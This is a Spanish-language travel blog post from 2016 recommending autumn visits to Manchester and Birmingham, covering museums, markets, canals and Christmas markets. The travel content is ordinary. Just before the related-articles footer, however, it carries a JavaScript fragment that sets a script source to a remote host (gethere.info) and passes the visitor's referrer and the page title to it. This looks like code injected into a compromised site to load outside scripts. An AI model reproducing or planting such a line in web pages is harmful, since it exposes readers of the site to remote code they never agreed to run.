Escapadas muy «British». Parte II.

14/11/2016

Manchester City Centre

Hoy le toca el turno a la parte II del otoño en Reino Unido, con Mánchester y Birmingham de protagonistas. Nuevamente dos ciudades con el típico clima anglosajón, pero que, insistimos, no debería ser un impedimento para plantarnos en ellas sea el momento del año que sea… 

*Mánchester. Si bien es cierto que no es la típica ciudad de turismo, cierto es también que si la visitas no tendrás tiempo de aburrirte. Esta ciudad situada al noroeste de Inglaterra se siente muy orgullosa de dos cosas: de su trayectoria musical y de su mundialmente famoso equipo de fútbol. De hecho, visitar el estadio del Mánchester United Football Club es una de las citas obligadas para muchos. Pero, como no todo es fútbol, ni todo es música: su Catedral, la biblioteca John Rylands, el Museo de la Ciencia y de la Industria o la Manchester Art Gallery son otras opciones para vuestra estancia en la ciudad. Incluso visitar Chinatown, su barrio más ajetreado, puede ser curioso. Adentraros sobre las 3 de la tarde, su ir y venir de personas, os dejará pasmados.

Además, a partir de este mes de noviembre la ciudad comienza a calentar motores para la época navideña: un montón de mercadillos dan el pistoletazo de salida. El asunto culmina en diciembre, con el encendido del alumbrado navideño.

¡Ah! Y hablando de mercadillos, cada sábado -durante los meses que van de marzo a diciembre-, el Levenshulme Market abre sus puertas. Al son de música en directo aquí podréis haceros con artículos hechos a mano, artículos vintage y muchas antigüedades, ¡entre otras cosas!

*Birmingham. De estética rompedora y vanguardista, la segunda ciudad del país os sorprenderá gratamente. Galerías, museos, centros comerciales…: como por ejemplo el interactivo Museo de las Ciencias Thinktank, la antiquísima Biblioteca Central o el gigante centro comercial The Bullring. Ocio de lo más versátil, apto para todos los gustos y colores. Lejos queda ya aquella etiqueta de «ciudad industrial» sin encanto alguno. Pues, aunque no se trata de la ciudad más bonita de Inglaterra, sí se trata de una de las más activas y dinámicas.

¿Cómo movernos en Birmingham? Como en cualquier otra ciudad, pateándola o bien, en barca. Esta segunda opción es viable gracias a la cantidad de canales que hay. Y parece ser que los paisajes que ofrece en ese recorrido de canales merecen la pena. Si optáis por la primera opción, no dejéis de perderos por sus calles del centro. Tomad buena nota de sus casas «back to back» y de sus edificios victorianos y de arts and crafts: os haréis una idea de la realidad de la ciudad durante el siglo XVIII, XIX y parte del XX.

Y, ya para acabar, otro apunte navideño: desde el 17 de noviembre y hasta el 29 de diciembre, el Frankfurt Christmas Market abrirá sus puertas este año. Se trata del mercado navideño más famoso de la ciudad. Si os coinciden las fechas acércaros, cantad villancios y antes de iros brindad con una taza de Glühwein, un vino especiado y caliente que hará que entréis en calor en un abrir y cerrar de ojos 😉 .

Foto | Stacey MacNaught

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO